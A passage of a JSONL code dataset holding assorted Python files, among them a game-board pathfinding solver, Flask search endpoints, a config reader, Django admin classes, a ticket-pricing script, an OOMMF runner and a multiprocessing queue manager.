blob is sampled correctly, remove it and in some cases a blob is missed\n magicNum = 10\n color = gameboardImage.getpixel((self.blocksize/2+x*self.blocksize, self.blocksize/2+y*self.blocksize+magicNum))\n if(color == _COLOR_RED):\n self.gameboard[y][x] = {'color': Color.red, 'objectType': MapObject.blob, 'coords': (x,y) ,'parentX': None, 'parentY': None, 'distance':-1}\n elif(color == _COLOR_GREEN):\n self.gameboard[y][x] = {'color': Color.green, 'objectType': MapObject.blob, 'coords': (x,y) ,'parentX': None, 'parentY': None, 'distance':-1}\n elif(color == _COLOR_DARKBLUE):\n self.gameboard[y][x] = {'color': Color.darkblue, 'objectType': MapObject.blob, 'coords': (x,y) ,'parentX': None, 'parentY': None, 'distance':-1}\n elif(color == _COLOR_LIGHTBLUE):\n self.gameboard[y][x] = {'color': Color.lightblue, 'objectType': MapObject.blob, 'coords': (x,y) ,'parentX': None, 'parentY': None, 'distance':-1}\n elif(color == _COLOR_YELLOW):\n self.gameboard[y][x] = {'color': Color.yellow, 'objectType': MapObject.blob, 'coords': (x,y) ,'parentX': None, 'parentY': None, 'distance':-1}\n elif(color == _COLOR_PURPLE):\n self.gameboard[y][x] = {'color': Color.purple, 'objectType': MapObject.blob, 'coords': (x,y) ,'parentX': None, 'parentY': None, 'distance':-1}\n else:\n self.gameboard[y][x] = {'color': Color.colorless, 'objectType': MapObject.empty, 'coords': (x,y) ,'parentX': None, 'parentY': None, 'distance':-1}\n\n def printBoard(self):\n for y in range(_BOARD_HEIGHT_BLOCK):\n for x in range(_BOARD_WIDTH_BLOCK):\n print(self.gameboard[y][x]['color'].name, end=\" \")\n print()\n\n # Resets all path of a certain color\n def clearColor(self, color):\n for y in range(_BOARD_HEIGHT_BLOCK):\n for x in range(_BOARD_WIDTH_BLOCK):\n if self.gameboard[y][x]['color'] == color and self.gameboard[y][x]['objectType'] == MapObject.path:\n self.gameboard[y][x]['color'] = Color.colorless\n self.gameboard[y][x]['objectType'] = MapObject.empty\n\n # Dijkstras bredsida\n # Finds shortest path from (startX,startY) to the nearest blob of the same color\n # Returns stack where the start pos is at the top and the goal at the bottom\n # OBS a reference to gameboard is sent! or atleast a reference to its mutable parts???\n def findPath(self,startX,startY,ignorePaths):\n # Reset all node in the gameboard\n for y in range(_BOARD_HEIGHT_BLOCK):\n for x in range(_BOARD_WIDTH_BLOCK):\n self.gameboard[y][x]['parentX'] = None\n self.gameboard[y][x]['parentY'] = None\n self.gameboard[y][x]['distance'] = math.inf\n\n # Init startnode\n color = self.gameboard[startY][startX]['color']\n self.gameboard[startY][startX]['distance'] = 0\n # List of node that have not been visited\n unvisited = [self.gameboard[startY][startX]]\n\n while unvisited:\n unvisited.sort(key= lambda dictEntry: dictEntry['distance']) # Sort after distance which is index 2 in tuple\n current = unvisited.pop(0)\n x = current['coords'][0]\n y = current['coords'][1]\n dist = current['distance']\n\n # If found goal stop looking\n if (not(x == startX) or not(y == startY)) and current['color'] == color and current['objectType'] == MapObject.blob:\n break\n\n # Update up\n tmpX = x\n tmpY = y-1\n if tmpY>=0 and self.gameboard[tmpY][tmpX]['distance'] > dist+1:\n if self.gameboard[tmpY][tmpX]['objectType'] == MapObject.empty or self.gameboard[tmpY][tmpX]['color'] == color or (ignorePaths and self.gameboard[tmpY][tmpX]['objectType'] == MapObject.path):\n self.gameboard[tmpY][tmpX]['parentX'] = x\n self.gameboard[tmpY][tmpX]['parentY'] = y\n self.gameboard[tmpY][tmpX]['distance'] = dist+1\n unvisited.append(self.gameboard[tmpY][tmpX])\n\n # right\n tmpX = x+1\n tmpY = y\n if tmpX<_BOARD_WIDTH_BLOCK and self.gameboard[tmpY][tmpX]['distance'] > dist+1:\n if self.gameboard[tmpY][tmpX]['objectType'] == MapObject.empty or self.gameboard[tmpY][tmpX]['color'] == color or (ignorePaths and self.gameboard[tmpY][tmpX]['objectType'] == MapObject.path):\n self.gameboard[tmpY][tmpX]['parentX'] = x\n self.gameboard[tmpY][tmpX]['parentY'] = y\n self.gameboard[tmpY][tmpX]['distance'] = dist+1\n unvisited.append(self.gameboard[tmpY][tmpX])\n\n # down\n tmpX = x\n tmpY = y+1\n if tmpY<_BOARD_HEIGHT_BLOCK and self.gameboard[tmpY][tmpX]['distance'] > dist+1:\n if self.gameboard[tmpY][tmpX]['objectType'] == MapObject.empty or self.gameboard[tmpY][tmpX]['color'] == color or (ignorePaths and self.gameboard[tmpY][tmpX]['objectType'] == MapObject.path):\n self.gameboard[tmpY][tmpX]['parentX'] = x\n self.gameboard[tmpY][tmpX]['parentY'] = y\n self.gameboard[tmpY][tmpX]['distance'] = dist+1\n unvisited.append(self.gameboard[tmpY][tmpX])\n\n # left\n tmpX = x-1\n tmpY = y\n if tmpX>=0 and self.gameboard[tmpY][tmpX]['distance'] > dist+1:\n if self.gameboard[tmpY][tmpX]['objectType'] == MapObject.empty or self.gameboard[tmpY][tmpX]['color'] == color or (ignorePaths and self.gameboard[tmpY][tmpX]['objectType'] == MapObject.path):\n self.gameboard[tmpY][tmpX]['parentX'] = x\n self.gameboard[tmpY][tmpX]['parentY'] = y\n self.gameboard[tmpY][tmpX]['distance'] = dist+1\n unvisited.append(self.gameboard[tmpY][tmpX])\n\n # When goal has been reached unravel path by adding current positions coords to the stack\n # then set current pos to parent and repeat until start positions is reached\n pathStack = []\n coordTuple = current['coords']\n pathStack.append(coordTuple)\n while not(coordTuple==self.gameboard[startY][startX]['coords']):\n current = self.gameboard[current['parentY']][current['parentX']]\n coordTuple = current['coords']\n pathStack.append(coordTuple)\n # If cross over another colors then add that color to unconnectedColors\n if not(current['color'] == Color.colorless) and current['color'] not in self.unconnectedColors:\n self.unconnectedColors.append(current['color'])\n self.clearColor(current['color'])\n\n # print(pathStack)\n return pathStack\n\n # Takes a stack of coordinates and drags the cursor from the coords at the top of the stack to the bottom\n def connectPath(self, pathStack):\n\n # debug\n import time\n time.sleep(0.1)\n\n currPos = pathStack.pop()\n currColor = self.gameboard[currPos[1]][currPos[0]]['color']\n setMouseCoords(self.xPadding+int(self.blocksize/2)+currPos[0]*self.blocksize, self.yPadding+int(self.blocksize/2)+currPos[1]*self.blocksize)\n prevPos = currPos\n while pathStack:\n currPos = pathStack.pop()\n # Mark new positions as a path\n self.gameboard[currPos[1]][currPos[0]]['color'] = currColor\n # Dont change to path if goal position since it is and must remain a blob\n if pathStack:\n self.gameboard[currPos[1]][currPos[0]]['objectType'] = MapObject.path\n\n if currPos[1]==prevPos[1]-1:#up\n mouseDrag(Direction.up,self.blocksize)\n elif currPos[0]==prevPos[0]+1: #right\n mouseDrag(Direction.right,self.blocksize)\n elif currPos[1]==prevPos[1]+1:#down\n mouseDrag(Direction.down,self.blocksize)\n elif currPos[0]==prevPos[0]-1:#left\n mouseDrag(Direction.left,self.blocksize)\n prevPos = currPos\n\n # Goes through the gameboard and finds one path between every pair of blobs\n def connectGameboard(self):\n # List of already finished colors\n # uncompletedColors = [Color.red, Color.green, Color.darkblue, Color.lightblue, Color.yellow, Color.purple]\n tries = 3\n prevUnconnectedColors = []\n while not(self.unconnectedColors==prevUnconnectedColors) and tries>0:\n prevUnconnectedColors = list(self.unconnectedColors)\n tries-=1\n for y in range(_BOARD_HEIGHT_BLOCK):\n for x in range(_BOARD_WIDTH_BLOCK):\n if self.gameboard[y][x]['objectType'] == MapObject.blob and self.gameboard[y][x]['color'] in self.unconnectedColors:\n path = self.findPath(x,y,False)\n # If the path is only the start pos (len 1) or if the goal pos is not a blob\n if(len(path) <= 1 or not(self.gameboard[path[0][1]][path[0][0]]['objectType'] == MapObject.blob)):\n # print(\"disregarding: \",self.gameboard[y][x]['color'],\" goal: \",self.gameboard[path[0][1]][path[0][0]])\n path = self.findPath(x,y,True)\n # print(\"connecting: \",self.gameboard[y][x]['color'],\" goal: \",self.gameboard[path[0][1]][path[0][0]])\n self.connectPath(path)\n self.unconnectedColors.remove(self.gameboard[y][x]['color'])\n # print(self.unconnectedColors, prevUnconnectedColors)\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":11677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"426617806","text":"class Solution:\n \"\"\"\n @param str: a string containing uppercase alphabets and integer digits\n @return: the alphabets in the order followed by the sum of digits\n \"\"\"\n def rearrange(self, string):\n # Write your code here\n if not string:\n return \"\"\n result = \"\"\n sum = 0\n for i in range(len(string)):\n if string[i].isalpha():\n result += string[i]\n else:\n sum += int(string[i])\n result = sorted(result)\n \n ans = \"\".join(result) + str(sum)\n return ans","sub_path":"python/2019/rerangeStringWithInteger.py","file_name":"rerangeStringWithInteger.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"627847142","text":"from flask import Blueprint, request, make_response, jsonify\nfrom flask.views import MethodView\nfrom flask_cors import cross_origin\nfrom app.database.models import Line, Translation, Content\nfrom app import app, db\nfrom flask_sqlalchemy import get_debug_queries\nfrom sqlalchemy.orm import joinedload\nfrom sqlalchemy import asc, desc, func\nfrom flask_cors import CORS\n\nsearch_blueprint = Blueprint('search', __name__)\nCORS(search_blueprint)\n\nclass SearchLineAPI(MethodView):\n \"\"\"\n Line Search Resource\n \"\"\"\n \n def get(self):\n\n keyword = request.args.get('keyword', '', type=str)\n page = request.args.get('page', 1, type=int)\n\n if len(keyword) <= 1:\n res_obj = {'message': 'There must be at least two characters.'}\n return make_response(jsonify(res_obj)), 400\n\n # ~: regexp in postgres\n # ~*: regexp ignorecase in postgres\n keyword = r'(^|[\\s])' + keyword + r'([\\s?!\\.,]|$)'\n line_count = db.session.query(func.count(Line.id)).filter(\n Line.line.op('~*')(keyword)).scalar()\n lines = Line.query.options(joinedload(Line.content, innerjoin=True)\n .joinedload(Content.category, innerjoin=True))\\\n .options(joinedload(Line.content, innerjoin=True)\n .joinedload(Content.genres))\\\n .filter(Line.line.op('~*')(keyword)).paginate(\n page, app.config['LINE_PER_PAGE'], False)\n res = []\n \n for line in lines.items:\n content = line.content\n genres = [genre.genre for genre in content.genres]\n\n content_dict = {\n 'title': content.title,\n 'category': content.category.category,\n 'genres': genres,\n 'reference': content.reference\n }\n res.append({\n 'id': line.id,\n 'time': str(line.time),\n 'line': line.line,\n 'content': content_dict\n\n })\n\n res_obj = {'count': line_count, 'lines': res}\n\n return make_response(jsonify(res_obj)), 200\n\n\nclass LineDetailAPI(MethodView):\n \"\"\"\n Line Detail Resource\n \"\"\"\n\n def get(self, line_id):\n\n lines_until_target_line = Line.query.options(joinedload(Line.content, innerjoin=True)\n .joinedload(Content.genres, innerjoin=True))\\\n .options(joinedload(Line.content, innerjoin=True)\n .joinedload(Content.category, innerjoin=True))\\\n .filter(Line.id <= line_id).order_by(desc(Line.id)).limit(5).all()\n\n lines_until_target_line = list(reversed(lines_until_target_line))\n\n try:\n line = lines_until_target_line[-1]\n except IndexError:\n res_obj = {'message': 'There is no matched line!'}\n return make_response(jsonify(res_obj)), 400\n\n target_line = {\n 'time': str(line.time),\n 'id': line.id,\n 'line': line.line\n }\n\n \n content = {\n 'id': line.content.id,\n 'title': line.content.title,\n 'category': line.content.category.category,\n 'genres': [genre.genre for genre in line.content.genres],\n 'reference': line.content.reference\n }\n\n if target_line['id'] != line_id:\n res_obj = {'message': 'There is no matched line!'}\n return make_response(jsonify(res_obj)), 400\n\n lines_after_target_line = Line.query.options(joinedload(Line.content, innerjoin=True))\\\n .filter(Line.id > line_id).order_by(asc(Line.id)).limit(5).all()\n lines = lines_until_target_line + lines_after_target_line\n\n lines = [line for line in lines ]\n\n res = []\n\n for line in lines:\n if line.content.title == content['title']:\n res.append({\n 'time': str(line.time),\n 'id': line.id,\n 'line': line.line\n })\n\n return make_response(jsonify({'content': content, 'target_line': target_line, 'lines': res})), 200\n\n\nclass SearchTranslationAPI(MethodView):\n \"\"\"\n Translation Search Resource\n \"\"\"\n\n def get(self):\n\n keyword = request.args.get('keyword', '', type=str)\n page = request.args.get('page', 1, type=int)\n\n if len(keyword) <= 1:\n res_obj = {'message': 'There must be at least two characters.'}\n return make_response(jsonify(res_obj)), 400\n\n keyword = r'(^|[\\s])' + keyword + r'([\\s?!\\.,]|$)'\n translation_count = db.session.query(func.count(func.distinct(Line.id))).join(Translation).filter(\n Translation.translation.op('~')(keyword)).scalar()\n\n translations = Translation.query.options(joinedload('line', innerjoin=True)\n .joinedload(Line.content)\n .joinedload(Content.category))\\\n .options(joinedload(Translation.content, innerjoin=True)\n .joinedload(Content.genres))\\\n .filter(Translation.translation.op('~')(keyword)).paginate(\n page, app.config['LINE_PER_PAGE'], False)\n\n res = []\n for translation in translations.items:\n line = translation.line\n content = translation.content\n genres = [genre.genre for genre in content.genres]\n content_dict = {\n 'content_id': content.id,\n 'title': content.title,\n 'category': content.category.category,\n 'genres': genres,\n 'reference': content.reference\n }\n res.append({\n 'id':translation.id,\n 'translation': translation.translation,\n 'line_id': line.id,\n 'line': line.line,\n 'content': content_dict\n })\n\n res_obj = {'count': translation_count, 'translations': res}\n return make_response(jsonify(res_obj)), 200\n\n\n# define the API resources\nsearch_line_view = SearchLineAPI.as_view('search_line_api')\nsearch_line_detail_view = LineDetailAPI.as_view('search_detail_api')\nsearch_translation_view = SearchTranslationAPI.as_view('search_traslation_api')\n\n# add Rules for API Endpoints\nsearch_blueprint.add_url_rule(\n '/search/lines',\n view_func=search_line_view,\n methods=['GET']\n)\n\nsearch_blueprint.add_url_rule(\n '/search/line_detail/',\n view_func=search_line_detail_view,\n methods=['GET']\n)\n\nsearch_blueprint.add_url_rule(\n '/search/translations',\n view_func=search_translation_view,\n methods=['GET']\n)\n","sub_path":"backend/app/router/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":6558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"319632026","text":"import os,sys,configparser\nfrom log.logger import RecordLogging\nDIR_PATH=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(DIR_PATH)\nconf_file=\"%s\\\\dataconfig\\\\config.ini\"%DIR_PATH\n\nclass GetConfigValue(object):\n '''封装读取ini格式的配置文件数据'''\n def __init__(self,filepath=None):\n if filepath!=None:\n self.filepath=filepath\n else:\n self.filepath=conf_file\n self.global_data=self.get_config_obj() #全局变量\n self.log=RecordLogging()\n #读取配置文件的对象\n def get_config_obj(self,):\n conf=configparser.ConfigParser()\n conf.read(self.filepath)\n return conf\n\n #读取配置文件的所有section值\n def get_section_value(self):\n section_value=self.global_data.sections()\n return section_value\n\n #获取指定section下的option值\n def get_from_section_optval(self,section_name):\n option_value=self.global_data.options(section_name)\n return option_value\n\n #获取指定section下的键值对值\n def get_item_value(self,section_name):\n item_value=dict(self.global_data.items(section_name))\n return item_value\n\n # 获取指定section下的指定option值\n def get_value(self,section_name,option_name):\n try:\n get_value=self.global_data.get(section_name,option_name)\n except Exception as e:\n self.log.logger.error(e)\n # self.log.logger.exception(e)\n else:\n return get_value\n\n # 将数据写入配置文件\n def write_conf_data(self,add_sec,sec_key,sec_value):\n '''add_sec增加新的section,传入section下面的key和value'''\n sections = self.get_section_value() #获取配置文件所有section值\n if add_sec not in sections:\n self.global_data.add_section(add_sec) #添加一个新的section\n self.global_data.set(add_sec,sec_key,sec_value) #设置section下的key、value值\n else:\n print(\"配置文件已存在该section名!\")\n with open(conf_file,'w') as f:\n self.global_data.write(f) #数据写入配置\n\n # 修改配置文件的值\n def update_conf_data(self,sec_name,sec_key,sec_value):\n sections_list = self.get_section_value() #获取配置文件中的所有section值\n if sec_name in sections_list:\n self.global_data.set(sec_name,sec_key,sec_value)\n else:\n print(\"配置文件不存在该名!\")\n with open(conf_file,\"w\") as f:\n self.global_data.write(f)\n\n\nif __name__==\"__main__\":\n conf=GetConfigValue()\n print(conf.update_conf_data('header','token','127.0.0.1'))\n\n\n","sub_path":"api_requests/data/getConfigdata.py","file_name":"getConfigdata.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"88835719","text":"from django.contrib import admin\nfrom .models import Category, Contact\n\nclass ContactAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'name',\n 'last_name',\n 'phone',\n 'email',\n 'creation_date',\n 'category',\n 'show'\n )\n\n list_display_links = (\n 'id',\n 'name',\n 'last_name'\n )\n\n list_filter = (\n 'name',\n 'last_name'\n )\n\n search_fields = (\n 'name',\n 'last_name',\n 'phone'\n )\n\n list_editable = (\n 'phone',\n 'show'\n )\n\n list_per_page = 10\n\nclass CategoryAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'name'\n )\n\n list_display_links = (\n 'id',\n 'name'\n )\n\n search_fields = (\n 'name',\n )\n\n list_per_page = 10\n\nadmin.site.register(Category, CategoryAdmin)\nadmin.site.register(Contact, ContactAdmin)\n","sub_path":"my_contacts/contacts/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"134391123","text":"\"\"\"\nThis module is an implementation of movie ticket system.\nIt collects the quantiy of movie tickets needed.....\n\nAuthor: Yok Yen\nDate: 7 Sept 2016\nVersion: 1.0\n\"\"\"\n\nADULT_TICKET_PRICE = 10\nCHILD_TICKET_PRICE = 5\nCONC_TICKET_PRICE = 8\nPREMIUM_FACTOR = 2\nEXTRAVAGANT_FACTOR = 5\nLUCKYNUM = 2\n\ndef getQuantity(prompt):\n \"\"\" This function gets the quantity base on the prompt.\n function getQuantity( prompt):\n display prompt\n get value from user\n while value is less than zero:\n print an error\n display prompt\n get value\n return ‘value’\n :param prompt: The message to display to user\n :return: The quantity user entered.\n \"\"\"\n value = int(input(prompt + \"\\n>>>\"))\n while value < 0: #While loop to display error message when the quantity is below 0\n print(\"Error in input.\")\n value = int(input(prompt + \"\\n>>>\"))\n return value\n\ndef calcTotalCost(packageCode, numAdultTickets, numChildTickets, numConcTickets):\n adultCost = numAdultTickets * ADULT_TICKET_PRICE\n childCost = numChildTickets * CHILD_TICKET_PRICE\n concCost = numConcTickets * CONC_TICKET_PRICE\n totalCost = adultCost + childCost + concCost\n if packageCode == 'P':\n\t totalCost = totalCost * PREMIUM_FACTOR\n elif packageCode == 'E':\n totalCost = totalCost * EXTRAVAGANT_FACTOR\n return totalCost\n\ndef getDiscount():\n import random\n rand_num = random.randint(1, 10)\n\n if rand_num == LUCKYNUM:\n discount = True\n else:\n discount = False\n return discount\n\ndef main():\n package = input(\"Welcome \\n Enter your choice(B, P, E):\").upper()\n\n while package not in ['B', 'P', 'E']:\n print(\"Error\")\n package = input(\"Welcome \\n Enter your choice(B, P, E):\").upper()\n\n adultTickets = getQuantity(\"How many adult tickets? \")\n childTickets = getQuantity(\"How many child tickets? \")\n concTickets = getQuantity(\"How many concession tickets? \")\n ticketCost = calcTotalCost(package, adultTickets, childTickets, concTickets)\n print(\"test:\", ticketCost)\n discounted = False\n if ticketCost > 100:\n discounted = getDiscount()\n if discounted == True :\n ticketCost = ticketCost * 0.8\n print(\"You received a 20% discount\")\n print(\"Final cost: \", ticketCost)\nmain()","sub_path":"week8_sample_answer.py","file_name":"week8_sample_answer.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"272959473","text":"import urllib\n\ndef movie_quotes():\n quotes = open(\"movie_quotes.txt\").read()\n check_profanity(quotes)\n\ndef read_text():\n quote = raw_input(\"Please enter some text. Let's see if your a naughty one...\\n\")\n check_profanity(quote)\n\ndef check_profanity(text_to_check):\n connection = urllib.urlopen(\"http://www.wdylike.appspot.com/?q=\"+text_to_check)\n output = connection.read()\n if output == \"false\":\n print (\"ALL GOOD! NO SWEAR WORDS!!! PATPAT\")\n elif output == \"true\":\n print (\"SWEAR WORDS!!! YOU'RE A NAUGHTY ONE!!!!!\")\n else:\n print (\"Could not scan the document properly.\")\n connection.close()\n\n#movie_quotes()\nread_text()\n","sub_path":"Swear_Alarm/swear_detector.py","file_name":"swear_detector.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"189964247","text":"import os\nimport sys\nimport sarge\n\n\nclass OOMMF:\n def __init__(self, varname=\"OOMMFTCL\", dockername=\"docker\",\n dockerimage=\"joommf/oommf\", where=None):\n self.varname = varname\n self.dockername = dockername\n self.dockerimage = dockerimage\n self.statusdict = self.status(raise_exception=False)\n self.where = self._where_to_run(where)\n\n def status(self, raise_exception=False, verbose=False):\n # OOMMF status on host\n cmd = (\"tclsh\", os.getenv(self.varname, \"wrong\"), \"boxsi\",\n \"+fg\", \"+version\", \"-exitondone\", \"1\")\n try:\n poommf = self._run_cmd(cmd)\n returncode = poommf.returncode\n except FileNotFoundError:\n returncode = 1\n if returncode:\n host = False\n if verbose:\n oommfpath = os.getenv(self.varname)\n if oommfpath is None:\n print(\"Cannot find {} path.\".format(self.varname))\n elif not os.path.isfile(oommfpath):\n print(\"{} path {} set to a non-existing \"\n \"file.\".format(self.varname, oommfpath))\n else:\n print(\"{} path {} set to an existing \"\n \"file.\".format(self.varname, oommfpath))\n print(\"Something wrong with OOMMF installation.\")\n else:\n host = True\n\n # Docker status\n cmd = (self.dockername, \"images\")\n try:\n pdocker = self._run_cmd(cmd)\n returncode = pdocker.returncode\n except FileNotFoundError:\n returncode = 1\n\n if returncode:\n docker = False\n if verbose:\n print(\"Docker not installed/active.\")\n else:\n docker = True\n\n # Raise exception if required\n if not (host or docker) and raise_exception:\n raise EnvironmentError(\"OOMMF and docker not found.\")\n\n return {\"host\": host, \"docker\": docker}\n\n def call(self, argstr, where=None):\n if where is None:\n where = self.where\n if self.statusdict[where]:\n if where == \"host\":\n return self._call_host(argstr=argstr)\n elif where == \"docker\":\n return self._call_docker(argstr=argstr)\n\n def version(self, where=None):\n where = self._where_to_run(where=where)\n p = self.call(argstr=\"+version\", where=where)\n return p.stderr.text.split(\"oommf.tcl\")[-1].strip()\n\n def _where_to_run(self, where):\n if where is None:\n if self.statusdict[\"host\"]:\n return \"host\"\n else:\n return \"docker\"\n else:\n return where\n\n def _call_host(self, argstr):\n oommfpath = os.getenv(self.varname, None)\n cmd = (\"tclsh\", oommfpath, \"boxsi\", \"+fg\",\n argstr, \"-exitondone\", \"1\")\n return self._run_cmd(cmd)\n\n def _call_docker(self, argstr):\n cmd = \"{} pull {}\".format(self.dockername, self.dockerimage)\n self._run_cmd(cmd)\n cmd = (\"{} run -v {}:/io {} /bin/bash -c \\\"tclsh \"\n \"/usr/local/oommf/oommf/oommf.tcl boxsi +fg {} \"\n \"-exitondone 1\\\"\").format(self.dockername, os.getcwd(),\n self.dockerimage, argstr)\n return self._run_cmd(cmd)\n\n def _run_cmd(self, cmd):\n if sys.platform in (\"linux\", \"darwin\"): # Linux and MacOs\n return sarge.capture_both(cmd)\n elif sys.platform.startswith(\"win\"):\n return sarge.run(cmd)\n else:\n msg = (\"Cannot handle platform '{}' - please report to \"\n \"developers\").format(sys.platform) # pragma: no cover\n raise NotImplementedError(msg)\n\n def kill(self, targets=('all',), where=None):\n where = self._where_to_run(where)\n print(where)\n if where == 'host':\n oommfpath = os.getenv(self.varname, None)\n sarge.run((\"tclsh\", oommfpath, \"killoommf\") + targets)\n","sub_path":"oommfc/oommf.py","file_name":"oommf.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"396989427","text":"\"\"\"\nExecute a command and produce the execution result\n\"\"\"\nfrom openpipe.pipeline.engine import ActionRuntime\nfrom subprocess import Popen, PIPE\n\n\nclass Action(ActionRuntime):\n\n category = \"Data Sourcing\"\n\n required_config = \"\"\"\n cmd: # The command to be executed\n \"\"\"\n optional_config = \"\"\"\n shell: True # Execute the command as parameters to a system shell\n output_as_text: True # Output the command output as text\n fail_on_error: True # Abort pipeline if exit code is not zero\n \"\"\"\n\n def on_input(self, item):\n new_item = {}\n cmd = self.config[\"cmd\"]\n shell = self.config[\"shell\"]\n process = Popen(\n cmd, shell=shell, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=True\n )\n stdout, stderr = process.communicate()\n if self.config[\"output_as_text\"]:\n if stdout:\n stdout = stdout.decode(\"utf-8\")\n if stderr:\n stderr = stderr.decode(\"utf-8\")\n if process.returncode != 0 and self.config[\"fail_on_error\"]:\n raise Exception(stderr)\n new_item = {\n \"stdout\": stdout,\n \"stderr\": stderr,\n \"return_code\": process.returncode,\n }\n self.put(new_item)\n","sub_path":"openpipe/actions/execute_.py","file_name":"execute_.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"435446681","text":"##############################################################################\n# (c) Crown copyright Met Office. All rights reserved.\n# For further details please refer to the file COPYRIGHT\n# which you should have received as part of this distribution\n##############################################################################\n'''\nClasses and methods relating to the queue system\n'''\nimport logging\nfrom queue import Empty as QueueEmpty\nfrom typing import List, Dict\nfrom multiprocessing import \\\n Queue, \\\n JoinableQueue, \\\n Process, \\\n Lock, \\\n Manager, \\\n Event\nfrom multiprocessing.synchronize import Lock as LockT\nfrom multiprocessing.synchronize import Event as EventT\n\nfrom fab.artifact import Artifact\nfrom fab.engine import Engine, DiscoveryState\n\n\ndef _worker(queue: JoinableQueue,\n engine: Engine,\n discovery: Dict[str, DiscoveryState],\n objects: List[Artifact],\n lock: LockT,\n stopswitch: EventT):\n while not stopswitch.is_set():\n try:\n artifact = queue.get(block=True, timeout=0.5)\n except QueueEmpty:\n continue\n\n try:\n new_artifacts = engine.process(artifact,\n discovery,\n objects,\n lock)\n\n for new_artifact in new_artifacts:\n queue.put(new_artifact)\n finally:\n queue.task_done()\n\n\nclass QueueManager(object):\n def __init__(self, n_workers: int, engine: Engine):\n self._queue: Queue = JoinableQueue()\n self._n_workers = n_workers\n self._workers: List[int] = []\n self._engine = engine\n self._mgr = Manager()\n self._discovery: Dict[str, DiscoveryState] = self._mgr.dict({})\n self._stopswitch: EventT = Event()\n self._objects: List[Artifact] = self._mgr.list([])\n self._lock = Lock()\n self.logger = logging.getLogger(__name__)\n\n def add_to_queue(self, artifact: Artifact):\n self._queue.put(artifact)\n\n def run(self):\n for _ in range(self._n_workers):\n process = Process(\n target=_worker, args=(self._queue,\n self._engine,\n self._discovery,\n self._objects,\n self._lock,\n self._stopswitch))\n process.start()\n self._workers.append(process)\n\n def check_queue_done(self):\n # Blocks until the JoinableQueue is empty\n self._queue.join()\n\n def shutdown(self):\n # Set the stop switch and wait for workers\n # to finish\n self._stopswitch.set()\n for process in self._workers:\n process.join(10.0)\n\n # Any that didn't finish nicely at this point\n # can be forcibly stopped\n for i_worker, process in enumerate(self._workers):\n if process.is_alive():\n msg = f\"Terminating thread {i_worker}...\"\n self.logger.warn(msg)\n process.terminate()\n\n # Stop the queue\n self._queue.close()\n self._queue.join_thread()\n self._workers.clear()\n","sub_path":"source/fab/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"538100661","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 23 16:24:40 2020\n\n@author: alisha\n\"\"\"\nimport pandas as pd\n\ndef plot_mean_diff_per_sub(df_mean, recog):\n \n t = 'recall'\n \n if recog:\n t = 'recog'\n #colors\n r = [250/255, 103/255, 80/255]\n lb = [167/255, 198/255, 250/255]\n b = [14/255, 72/255, 173/255]\n \n sel = ['rest','video','game']\n ax = df_mean.loc[:,sel].plot.bar(\n title = F'Mean Differences Per Subject -{t} (Reaction times, Session 1)',\n color = [r,lb,b])\n \n ax.set_xlabel('Subjects')\n ax.set_ylabel('Mean differences in time [delayed - immediate]')\n \n\ndef plot_groupmean(means, recog):\n \n t = 'recall'\n \n if recog:\n t = 'recog'\n \n #calculate and plot average of group\n group_mean = pd.DataFrame({'rest': [means['rest'].mean()],\n \n 'video':[means['video'].mean()],\n 'game': [means['game'].mean()]})\n group_std = pd.DataFrame({'rest': [means['rest'].std()],\n \n 'video':[means['video'].std()],\n 'game': [means['game'].std()]})\n \n #colors\n r = [250/255, 103/255, 80/255]\n lb = [167/255, 198/255, 250/255]\n b = [14/255, 72/255, 173/255]\n \n ax = group_mean.plot.bar(\n title = F'Mean Differences - {t} (Reaction times, Session 1)',\n yerr = group_std, capsize = 8, \n color = [r,lb,b])\n \n ax.set_xlabel('Conditions')\n ax.set_ylabel('Mean differences [delayed - immediate]')\n# ax.text(0.3,0.3, F'P = {p}')","sub_path":"rt_plot.py","file_name":"rt_plot.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"642614639","text":"#\n\nstream = open(r'./aaa.txt')\n\ncontainer = stream.read()\n\nprint(container)\n\n# open操作\n\"\"\"\n read 读所有 \n readline 读一行\n readlines 将每一行转成列表\n readable 判断是否可读\n\"\"\"\n\n\"\"\"\n写文件\n\nmode = w\n方法 :\n write 先清空,再写\n \n\"\"\"\n\nwith open(r'./aaa.txt', mode='rb') as stream:\n inner = stream.read()\nwith open(r'../day1/aaa.txt', mode='wb') as file:\n file.write(inner)\n","sub_path":"day2/文件操作.py","file_name":"文件操作.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"316835280","text":"import datetime\r\nimport json\r\n\r\ndef 